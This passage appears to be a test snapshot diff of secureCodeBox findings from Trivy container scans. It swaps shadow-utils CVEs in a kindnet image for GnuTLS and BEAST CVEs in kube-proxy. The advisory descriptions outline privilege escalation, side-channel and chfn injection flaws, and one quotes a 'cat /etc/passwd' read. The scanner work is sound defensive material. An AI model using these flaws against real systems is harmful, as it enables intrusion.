"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "name": "timing side-channel in the TLS RSA key exchange code", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "https://avd.aquasec.com/nvd/cve-2023-0361", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "https://access.redhat.com/errata/RHSA-2023:1141", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "https://access.redhat.com/security/cve/CVE-2023-0361", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2162596", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "https://errata.rockylinux.org/RLSA-2023:1569", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5901-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "3.7.1-5+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4209", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "https://access.redhat.com/security/cve/CVE-2021-4209", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "https://security.netapp.com/advisory/ntap-20220915-0005/", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://ubuntu.com/security/notices/USN-5750-1", + "https://www.cve.org/CVERecord?id=CVE-2021-4209", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "GnuTLS: Null pointer dereference in MD_UPDATE", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://avd.aquasec.com/nvd/cve-2021-4209", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://access.redhat.com/security/cve/CVE-2021-4209", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5550-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5750-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3389", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", + "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "http://curl.haxx.se/docs/adv_20120124B.html", + "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "http://ekoparty.org/2011/juliano-rizzo.php", + "http://eprint.iacr.org/2004/111", + "http://eprint.iacr.org/2006/136", + "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "http://osvdb.org/74829", + "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "http://secunia.com/advisories/45791", + "http://secunia.com/advisories/47998", + "http://secunia.com/advisories/48256", + "http://secunia.com/advisories/48692", + "http://secunia.com/advisories/48915", + "http://secunia.com/advisories/48948", + "http://secunia.com/advisories/49198", + "http://secunia.com/advisories/55322", + "http://secunia.com/advisories/55350", + "http://secunia.com/advisories/55351", + "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "http://support.apple.com/kb/HT4999", + "http://support.apple.com/kb/HT5001", + "http://support.apple.com/kb/HT5130", + "http://support.apple.com/kb/HT5281", + "http://support.apple.com/kb/HT5501", + "http://support.apple.com/kb/HT6150", + "http://technet.microsoft.com/security/advisory/2588513", + "http://vnhacker.blogspot.com/2011/09/beast.html", + "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "http://www.debian.org/security/2012/dsa-2398", + "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "http://www.ibm.com/developerworks/java/jdk/alerts/", + "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "http://www.insecure.cl/Beast-SSL.rar", + "http://www.kb.cert.org/vuls/id/864643", + "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "http://www.opera.com/docs/changelogs/mac/1151/", + "http://www.opera.com/docs/changelogs/mac/1160/", + "http://www.opera.com/docs/changelogs/unix/1151/", + "http://www.opera.com/docs/changelogs/unix/1160/", + "http://www.opera.com/docs/changelogs/windows/1151/", + "http://www.opera.com/docs/changelogs/windows/1160/", + "http://www.opera.com/support/kb/view/1004/", + "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "http://www.securityfocus.com/bid/49388", + "http://www.securityfocus.com/bid/49778", + "http://www.securitytracker.com/id/1029190", + "http://www.securitytracker.com/id?1025997", + "http://www.securitytracker.com/id?1026103", + "http://www.securitytracker.com/id?1026704", + "http://www.ubuntu.com/usn/USN-1263-1", + "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "https://access.redhat.com/security/cve/CVE-2011-3389", + "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "https://hermes.opensuse.org/messages/13154861", + "https://hermes.opensuse.org/messages/13155432", + "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "https://linux.oracle.com/cve/CVE-2011-3389.html", + "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "https://ubuntu.com/security/notices/USN-1263-1", + "https://www.cve.org/CVERecord?id=CVE-2011-3389", ], }, "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://avd.aquasec.com/nvd/cve-2011-3389", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "http://curl.haxx.se/docs/adv_20120124B.html", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "http://ekoparty.org/2011/juliano-rizzo.php", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "http://eprint.iacr.org/2004/111", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "http://eprint.iacr.org/2006/136", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "http://osvdb.org/74829", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "http://secunia.com/advisories/45791", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "http://secunia.com/advisories/47998", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "http://secunia.com/advisories/48256", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "http://secunia.com/advisories/48692", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "http://secunia.com/advisories/48915", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "http://secunia.com/advisories/48948", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "http://secunia.com/advisories/49198", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "http://secunia.com/advisories/55322", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": 